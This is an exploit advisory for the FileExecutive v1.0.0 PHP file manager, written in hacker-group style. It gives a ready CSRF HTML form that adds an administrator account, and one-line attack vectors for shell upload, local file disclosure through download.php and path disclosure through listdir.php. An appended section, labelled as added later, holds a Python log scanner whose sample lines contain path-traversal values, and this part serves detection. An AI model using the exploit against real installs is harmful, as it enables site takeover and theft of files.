==============================================================================
    [»] Thx To : [ Jiko ,H.Scorpion ,Dr.Bahy ,T3rr0rist ,Golden-z3r0 ,Shr7 Team . ]
==============================================================================
    [»] FileExecutive Multiple Vulnerabilities
==============================================================================

[»] Script:     [ FileExecutive v1.0.0 ]
[»] Language:   [ PHP ]
[»] Site page:  [ FileExecutive is a web-based file manager written in PHP. ]
[»] Download:   [ http://sourceforge.net/projects/fileexecutive/ ]
[»] Founder:    [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to:  [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.Org ]
[»] My Home:    [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploits ]===

Add/Edit Admin CSRF:

<html>
<head>
<title>FileExecutive Remote Add Admin Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action='http://localhost/scripts/file/admin/add_user.php' method='POST' onSubmit='return chk(this)'>
<th colspan='5'>Add A user<hr></th>
<td>Username:</td>
<input type='text' name='username' value='' maxlength='32' onkeyup="showHint(this.value)">
<Br>
<td>Password:</td>
<input type='text' name='password' value=''>
<Br>
<td>Name:</td>
<input type='text' name='name' value='' maxlength='32'>
<Br>
<td>Root Directory:</td>
<input type='text' name='root' value='' maxlength='200'>
<Br>
<td>Max Upload Size:</td>
<input type='text' name='uload_maxsize' value='' size='8'>
<Br>
<select name='multiplier'>
<option value='1' selected>Bytes</option>
<option value='1024'>KB</option>
<option value='1048576'>MB</option>
</select>
<td>Group:</td><td><select name='groupid' id='groupid'><option value='0' selected>No Group</option></select></td>
<td>Use Group permissions?</td><td>Yes:<input type='radio' name='grp_perms' value='1'></td><td>No:<input type='radio' name='grp_perms' value='0' id="abc" checked></td>
<td>Is user Admin?</td><td>Yes:<input type='radio' name='admin' value='1'></td><td>No:<input type='radio' name='admin' value='0' id="abc" checked>
<td colspan='2'><fieldset><legend>Permissions</legend>
<td><input type='checkbox' name='mkfile' value='1'>Create File</td>
<td><input type='checkbox' name='mkdir' value='1'>Create Folder</td>
<td><input type='checkbox' name='uload' value='1'>Upload</td>
<td><input type='checkbox' name='rename' value='1'>Rename</td>
<td><input type='checkbox' name='delete' value='1'>Delete</td>
<td><input type='checkbox' name='edit' value='1'>Edit</td>
<td><input type='checkbox' name='dload' value='1'>Download</td>
<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
<td><input type='checkbox' name='move' value='1'>Move</td>
<td> </td></tr>
<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
</form>
</body>
</html>

Shell Upload:

[»] By Go To The End Of Page & Browse Your Shell 2 upload it    <-=- Remote File Upload Vulnerability

Local File Disclosure:

[»] http://localhost/[path]/download.php?file=./LFD    <-=- Local File Disclosure Vulnerability

Full Path Disclosure:

[»] http://localhost/[path]/listdir.php?dir=./FPD    <-=- Full Path Disclosure Vulnerability

Author: ViRuSMaN <-

###########################################################################
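
For administrators of an affected install, the following is an added detection example (not part of the original advisory and not FileExecutive code). It scans web-server access logs for the request shapes listed above: a POST to admin/add_user.php whose Referer is another origin or missing, and download.php / listdir.php requests whose file or dir parameter is absolute or contains ".." segments. It assumes Apache/nginx Combined Log Format; SITE_HOST and the log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size "referer" "agent"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" \d{3} \S+ "([^"]*)"')
SITE_HOST = "files.example.test"  # assumption: host name the file manager is served from

SAMPLE_LOG = [  # constructed log lines, not taken from a real server
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "POST /file/admin/add_user.php HTTP/1.1" 200 512 "http://other.example.test/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2024:13:56:01 +0000] "POST /file/admin/add_user.php HTTP/1.1" 200 512 "http://files.example.test/file/admin/index.php" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2024:14:02:10 +0000] "GET /file/download.php?file=..%2F..%2Fsecret.txt HTTP/1.1" 200 1024 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2024:14:02:30 +0000] "GET /file/download.php?file=docs/report.pdf HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2024:14:03:05 +0000] "GET /file/listdir.php?dir=/etc HTTP/1.1" 200 300 "-" "curl/8.0"',
]

def suspicious_path(value):
    """True when a file/dir value is absolute, has a '..' segment, or a NUL byte."""
    parts = value.replace("\\", "/").split("/")
    return value.startswith(("/", "\\")) or ".." in parts or "\x00" in value

def classify(line):
    """Return a list of (rule, client_ip, evidence) findings for one log line."""
    m = LINE.match(line)
    if not m:
        return []
    ip, method, target, referer = m.groups()
    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    findings = []
    # Admin state change submitted from another origin (or with no Referer at all).
    if method == "POST" and url.path.endswith("/admin/add_user.php"):
        ref_host = urlsplit(referer).hostname
        if ref_host != SITE_HOST:
            findings.append(("csrf-add-user", ip, referer))
    for script, param in (("download.php", "file"), ("listdir.php", "dir")):
        if url.path.endswith("/" + script):
            for value in query.get(param, []):
                if suspicious_path(value):
                    findings.append(("path-" + param, ip, value))
    return findings

def scan(lines):
    """Flatten the findings for every line of a log."""
    return [finding for line in lines for finding in classify(line)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on the first rule is a reason to review the user table for accounts nobody created on purpose; the Referer check is a heuristic and does not replace per-request anti-CSRF tokens in the application.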